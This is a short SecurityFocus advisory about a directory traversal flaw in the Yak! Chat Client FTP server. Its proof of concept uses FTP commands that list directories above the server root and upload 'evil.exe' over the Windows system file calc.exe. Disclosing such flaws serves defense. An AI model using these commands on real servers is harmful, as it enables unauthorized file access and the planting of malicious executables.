Yak! Chat Client FTP Server Directory Traversal Vulnerability

An exploit is not required.

The following proof of concept is available:
dir /
dir ../../windows/

put
evil.exe
../../windows/calc.exe


 

Privacy Statement
Copyright 2010, SecurityFocus